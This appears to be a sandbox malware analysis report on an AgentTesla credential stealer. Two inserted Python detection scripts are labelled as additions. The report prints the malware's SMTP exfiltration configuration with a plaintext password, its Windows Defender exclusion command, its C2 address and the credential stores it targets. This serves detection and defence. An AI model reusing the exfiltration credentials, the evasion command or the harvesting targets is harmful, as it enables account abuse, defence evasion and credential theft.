Windows Analysis Report
ORDER#023_2024.exe

Overview

General Information

Sample name: ORDER#023_2024.exe
Analysis ID: 1568740
MD5: cb93d77357df18ffb788e73e7f9e8ba1
SHA1: 0fa0e09a4905239dca028b58a0e6523e8c91498c
SHA256: 3591cadebdbbaee9e75158d085435cf81ba8cdfc5c92b050275f9b490ee60998
Tags: AgentTesla, exe, user-threatcat_ch

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AgentTesla
Yara detected AntiVM3
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Outbound SMTP Connections
Uses 32bit PE files
Uses SMTP (mail sending)
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • ORDER#023_2024.exe (PID: 6936 cmdline: "C:\Users\user\Desktop\ORDER#023_2024.exe" MD5: CB93D77357DF18FFB788E73E7F9E8BA1)
    • powershell.exe (PID: 3180 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ORDER#023_2024.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 3168 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 6016 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • ORDER#023_2024.exe (PID: 6036 cmdline: "C:\Users\user\Desktop\ORDER#023_2024.exe" MD5: CB93D77357DF18FFB788E73E7F9E8BA1)
    • ORDER#023_2024.exe (PID: 4268 cmdline: "C:\Users\user\Desktop\ORDER#023_2024.exe" MD5: CB93D77357DF18FFB788E73E7F9E8BA1)
  • cleanup
Name: Agent Tesla, AgentTesla
Description: A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
Attribution: SWEED
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Extracted malware configuration:
{"Exfil Mode": "SMTP", "Host": "mail.mbarieservicesltd.com", "Username": "saless@mbarieservicesltd.com", "Password": "     *o9H+18Q4%;M     "}
Yara matches (Source | Rule | Description | Author)

PCAP:
dump.pcap | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security

Memory dumps:
00000005.00000002.2905038066.000000000305A000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000005.00000002.2903371766.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security
00000005.00000002.2905038066.0000000003001000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000005.00000002.2905038066.0000000003001000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000000.00000002.1681703639.0000000003BC1000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security
(5 further memory-dump entries are collapsed in the original report)

Unpacked PE files:
5.2.ORDER#023_2024.exe.400000.0.unpack | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security
0.2.ORDER#023_2024.exe.3c384f0.0.unpack | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security
0.2.ORDER#023_2024.exe.3c61510.1.unpack | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security
0.2.ORDER#023_2024.exe.3c61510.1.raw.unpack | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security
0.2.ORDER#023_2024.exe.3c384f0.0.raw.unpack | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security

                        System Summary

Sigma rule matches:
Source: Process started; Author: Florian Roth (Nextron Systems); two rules by this author matched the same event (identical data, listed once); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ORDER#023_2024.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ORDER#023_2024.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\ORDER#023_2024.exe", ParentImage: C:\Users\user\Desktop\ORDER#023_2024.exe, ParentProcessId: 6936, ParentProcessName: ORDER#023_2024.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ORDER#023_2024.exe", ProcessId: 3180, ProcessName: powershell.exe
Source: Network Connection; Author: frack113; Data: DestinationIp: 199.79.62.115, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\Desktop\ORDER#023_2024.exe, Initiated: true, ProcessId: 4268, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49734
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ORDER#023_2024.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ORDER#023_2024.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\ORDER#023_2024.exe", ParentImage: C:\Users\user\Desktop\ORDER#023_2024.exe, ParentProcessId: 6936, ParentProcessName: ORDER#023_2024.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ORDER#023_2024.exe", ProcessId: 3180, ProcessName: powershell.exe
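The process-start matches above all key on the same thing: a PowerShell child of the sample running Add-MpPreference -ExclusionPath against its own path. As an added illustration (this is not part of the Joe Sandbox report and not Sigma's code), the check below re-implements that logic in Python over constructed Sysmon-style process-creation records. The first record reproduces the report's PID 3180 event; the -EncodedCommand record (PID 4444) and the benign Get-MpComputerStatus record (PID 5555) are made up. base64offset_variants follows the semantics of Sigma's base64offset modifier (the "CommandLine|base64offset|contains" field in the match data); the user-profile-parent heuristic is this example's own addition, not a named Sigma rule.

```python
import base64
import re

# Constructed Sysmon Event ID 1 (process creation) records. The first one
# reproduces the process-tree entry in this report (PID 6936 -> PID 3180);
# the other two are made-up contrasts: an -EncodedCommand variant and a
# benign query that must not fire.
_ENCODED_PAYLOAD = base64.b64encode(
    "Add-MpPreference -ExclusionPath 'C:\\Users\\user\\AppData\\Roaming'".encode("utf-16le")
).decode()

SAMPLE_EVENTS = [
    {
        "ProcessId": 3180,
        "Image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ORDER#023_2024.exe"',
        "ParentImage": r"C:\Users\user\Desktop\ORDER#023_2024.exe",
    },
    {
        "ProcessId": 4444,  # constructed: same cmdlet hidden behind -EncodedCommand
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": f"powershell.exe -NoProfile -EncodedCommand {_ENCODED_PAYLOAD}",
        "ParentImage": r"C:\Users\user\Downloads\invoice.exe",
    },
    {
        "ProcessId": 5555,  # constructed: benign Defender status query from a service
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell.exe -Command Get-MpComputerStatus",
        "ParentImage": r"C:\Windows\System32\svchost.exe",
    },
]

# Plain-text form: (Add|Set)-MpPreference followed by an -Exclusion* parameter.
EXCLUSION_RE = re.compile(
    r"\b(?:Add|Set)-MpPreference\b.*?-Exclusion(?:Path|Process|Extension|IpAddress)\b",
    re.IGNORECASE | re.DOTALL,
)
# base64 is case-sensitive, so cover the spellings the cmdlet is usually typed in.
MPPREF_NEEDLES = ("Add-MpPreference ", "Set-MpPreference ",
                  "add-mppreference ", "set-mppreference ")


def base64offset_variants(needle: bytes) -> list[str]:
    """Sigma's base64offset modifier: encode `needle` at the three possible
    byte alignments (0, 1 or 2 unknown bytes in front of it) and trim the
    characters whose value depends on the unknown neighbouring bytes, so a
    plain substring search on the encoded command line hits regardless of
    where the needle sits inside the encoded script."""
    start = (0, 2, 3)          # leading chars polluted by the i padding bytes
    end = (None, -3, -2)       # trailing chars polluted, indexed by total length % 3
    variants = []
    for i in range(3):
        enc = base64.b64encode(b"\x00" * i + needle).decode()
        variants.append(enc[start[i]:end[(len(needle) + i) % 3]])
    return variants


def _base64offset_hit(cmdline: str, needle: str) -> bool:
    # PowerShell's -EncodedCommand carries UTF-16LE, so the "wide" form of the
    # needle is the one that fires for -enc; the ASCII form covers
    # [Convert]::FromBase64String() style tricks on a plain byte string.
    for raw in (needle.encode("ascii"), needle.encode("utf-16le")):
        if any(v in cmdline for v in base64offset_variants(raw)):
            return True
    return False


def evaluate(event: dict) -> list[str]:
    """Return the names of the checks that fire for one process-creation event."""
    hits: list[str] = []
    image = event["Image"].lower()
    if not image.endswith(("\\powershell.exe", "\\pwsh.exe")):
        return hits
    cmd = event["CommandLine"]
    if EXCLUSION_RE.search(cmd):
        hits.append("powershell_defender_exclusion")
    if any(_base64offset_hit(cmd, n) for n in MPPREF_NEEDLES):
        hits.append("powershell_base64_mppreference")
    # Heuristic of this example (not a named Sigma rule): Defender tampering
    # launched by an executable under a user profile is exactly what the
    # report's process tree shows and is rarely what an administrator does.
    if hits and event["ParentImage"].lower().startswith("c:\\users\\"):
        hits.append("defender_tamper_from_user_profile_parent")
    return hits


def scan(events: list[dict]) -> dict[int, list[str]]:
    return {e["ProcessId"]: evaluate(e) for e in events}


if __name__ == "__main__":
    for pid, hits in scan(SAMPLE_EVENTS).items():
        print(pid, hits or "-")
```

The plain-text regex alone misses the encoded variant, and the base64 check alone misses the plain one, which is why the report's event is covered by two separate rules; in production the parent-path heuristic is better expressed as a severity boost than as a standalone alert, since installers under Downloads do occasionally add legitimate exclusions.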
Suricata IDS alerts (Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol)
2024-12-04T22:03:40.849487+0100 | 2030171 | 1 | A Network Trojan was detected | 192.168.2.4 | 49734 | 199.79.62.115 | 587 | TCP
2024-12-04T22:02:06.918218+0100 | 2855542 | 1 | A Network Trojan was detected | 192.168.2.4 | 49734 | 199.79.62.115 | 587 | TCP
2024-12-04T22:02:06.918218+0100 | 2855245 | 1 | A Network Trojan was detected | 192.168.2.4 | 49734 | 199.79.62.115 | 587 | TCP
2024-12-04T22:03:40.849487+0100 | 2839723 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49734 | 199.79.62.115 | 587 | TCP
2024-12-04T22:03:40.849487+0100 | 2840032 | 1 | A Network Trojan was detected | 192.168.2.4 | 49734 | 199.79.62.115 | 587 | TCP
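All five IDS alerts sit on one TCP flow, 192.168.2.4:49734 to 199.79.62.115:587, and the Sysmon network-connection match above ties that same flow to PID 4268 of the sample. As an added example (not part of the report), the Python below does the two things an analyst wants from that data: flag outbound SMTP-port connections from anything that is not an allowlisted mail client, which is the logic behind the "Suspicious Outbound SMTP Connections" hit, and join IDS alerts to the process that opened the flow. The Sysmon record for PID 4268 and the alert tuples are taken from this report; the Outlook record and the allowlist are constructed.

```python
# Constructed Sysmon Event ID 3 (network connection) records. The first is the
# one this report shows for PID 4268; the second is a made-up benign mail
# client submitting on the same port and must not be flagged.
SYSMON_NET_EVENTS = [
    {"EventID": 3, "ProcessId": 4268, "Image": r"C:\Users\user\Desktop\ORDER#023_2024.exe",
     "Initiated": True, "Protocol": "tcp", "SourceIp": "192.168.2.4", "SourcePort": 49734,
     "DestinationIp": "199.79.62.115", "DestinationPort": 587},
    {"EventID": 3, "ProcessId": 7100, "Image": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
     "Initiated": True, "Protocol": "tcp", "SourceIp": "192.168.2.4", "SourcePort": 49801,
     "DestinationIp": "203.0.113.25", "DestinationPort": 587},  # constructed
]

# The five Suricata alerts from this report, reduced to
# (timestamp, sid, classtype, src ip, src port, dst ip, dst port).
SURICATA_ALERTS = [
    ("2024-12-04T22:03:40.849487+0100", 2030171, "A Network Trojan was detected",
     "192.168.2.4", 49734, "199.79.62.115", 587),
    ("2024-12-04T22:02:06.918218+0100", 2855542, "A Network Trojan was detected",
     "192.168.2.4", 49734, "199.79.62.115", 587),
    ("2024-12-04T22:02:06.918218+0100", 2855245, "A Network Trojan was detected",
     "192.168.2.4", 49734, "199.79.62.115", 587),
    ("2024-12-04T22:03:40.849487+0100", 2839723, "Malware Command and Control Activity Detected",
     "192.168.2.4", 49734, "199.79.62.115", 587),
    ("2024-12-04T22:03:40.849487+0100", 2840032, "A Network Trojan was detected",
     "192.168.2.4", 49734, "199.79.62.115", 587),
]

MAIL_PORTS = {25, 465, 587, 2525}
# Images allowed to speak SMTP from a workstation. Constructed starting point;
# tune per estate (service hosts and MTAs belong on their own list).
MAIL_CLIENT_ALLOWLIST = ("\\outlook.exe", "\\thunderbird.exe")


def suspicious_smtp_connections(events: list[dict]) -> list[int]:
    """PIDs that initiated a connection to a mail port from a non-mail-client image."""
    flagged = []
    for e in events:
        if e["EventID"] != 3 or not e["Initiated"]:
            continue
        if e["DestinationPort"] not in MAIL_PORTS:
            continue
        if e["Image"].lower().endswith(MAIL_CLIENT_ALLOWLIST):
            continue
        flagged.append(e["ProcessId"])
    return flagged


def attribute_alerts(alerts: list[tuple], events: list[dict]) -> list[dict]:
    """Join each IDS alert to the endpoint process that opened the flow.

    The join key is the 4-tuple of the flow. Ephemeral source ports are reused
    over time, so on real telemetry add a time window around the alert
    timestamp; the report gives no Sysmon timestamp, so none is used here."""
    by_flow = {
        (e["SourceIp"], e["SourcePort"], e["DestinationIp"], e["DestinationPort"]): e
        for e in events if e["EventID"] == 3
    }
    out = []
    for ts, sid, classtype, sip, sport, dip, dport in alerts:
        proc = by_flow.get((sip, sport, dip, dport))
        out.append({
            "timestamp": ts, "sid": sid, "classtype": classtype,
            "pid": proc["ProcessId"] if proc else None,
            "image": proc["Image"] if proc else None,
        })
    return out


if __name__ == "__main__":
    print("suspicious SMTP from PIDs:", suspicious_smtp_connections(SYSMON_NET_EVENTS))
    for row in attribute_alerts(SURICATA_ALERTS, SYSMON_NET_EVENTS):
        print(row["sid"], row["classtype"], "->", row["pid"], row["image"])
```

The attribution step is what turns five network-only alerts into one host finding (PID 4268 of ORDER#023_2024.exe, the third process in the tree, is the exfiltration stage); without the endpoint join the IDS alone cannot say which of the three same-named processes sent the mail.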


                        AV Detection

Source: 5.2.ORDER#023_2024.exe.400000.0.unpack; Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Host": "mail.mbarieservicesltd.com", "Username": "saless@mbarieservicesltd.com", "Password": " *o9H+18Q4%;M "}
Source: ORDER#023_2024.exe; ReversingLabs: Detection: 65%
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 100.0% probability
Source: ORDER#023_2024.exe; Joe Sandbox ML: detected
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: /log.tmp
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: <br>[
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: yyyy-MM-dd HH:mm:ss
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: ]<br>
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: <br>
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: Time:
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: MM/dd/yyyy HH:mm:ss
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: <br>User Name:
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: <br>Computer Name:
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: <br>OSFullName:
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: <br>CPU:
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: <br>RAM:
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: <br>
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: IP Address:
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: <br>
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: <hr>
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: New
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: MM/dd/yyyy HH:mm:ss
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: IP Address:
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: false
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: false
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: false
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: false
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: false
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: false
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: false
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: false
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: false
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: mail.mbarieservicesltd.com
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: saless@mbarieservicesltd.com
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: *o9H+18Q4%;M
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: iinfo@mbarieservicesltd.com
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: false
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: false
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: appdata
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: KTvkzEc
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: KTvkzEc.exe
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: KTvkzEc
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: Type
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: <br>
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: <hr>
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: <br>
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: <b>[
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: ]</b> (
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: )<br>
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: {BACK}
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: {ALT+TAB}
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: {ALT+F4}
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: {TAB}
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: {ESC}
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: {Win}
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: {CAPSLOCK}
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: {KEYUP}
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: {KEYDOWN}
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: {KEYLEFT}
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: {KEYRIGHT}
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: {DEL}
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: {END}
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: {HOME}
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: {Insert}
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: {NumLock}
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: {PageDown}
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: {PageUp}
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: {ENTER}
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: {F1}
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: {F2}
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: {F3}
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: {F4}
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: {F5}
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: {F6}
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: {F7}
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: {F8}
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: {F9}
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: {F10}
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: {F11}
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: {F12}
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: control
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: {CTRL}
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: &amp;
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: &lt;
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: &gt;
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: &quot;
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: <br><hr>Copied Text: <br>
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: <hr>
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: logins
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: IE/Edge
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: Windows Secure Note
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: 3CCD5499-87A8-4B10-A215-608888DD3B55
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: Windows Web Password Credential
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: 154E23D0-C644-4E6F-8CE6-5069272F999F
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: Windows Credential Picker Protector
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: Web Credentials
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: Windows Credentials
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: Windows Domain Certificate Credential
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: Windows Domain Password Credential
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: Windows Extended Credential
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: 00000000-0000-0000-0000-000000000000
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: SchemaId
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: pResourceElement
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: pIdentityElement
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: pPackageSid
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: pAuthenticatorElement
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: IE/Edge
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: UC Browser
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: UCBrowser\
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: Login Data
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: journal
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: wow_logins
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: Safari for Windows
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: \Common Files\Apple\Apple Application Support\plutil.exe
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: \Apple Computer\Preferences\keychain.plist
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: <array>
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: <dict>
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: <string>
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: </string>
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: <string>
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: </string>
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: <data>
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: </data>
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: -convert xml1 -s -o "
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: \fixed_keychain.xml"
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: \Microsoft\Credentials\
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: \Microsoft\Credentials\
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: \Microsoft\Credentials\
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: \Microsoft\Credentials\
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: \Microsoft\Protect\
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: credential
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: QQ Browser
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: Tencent\QQBrowser\User Data
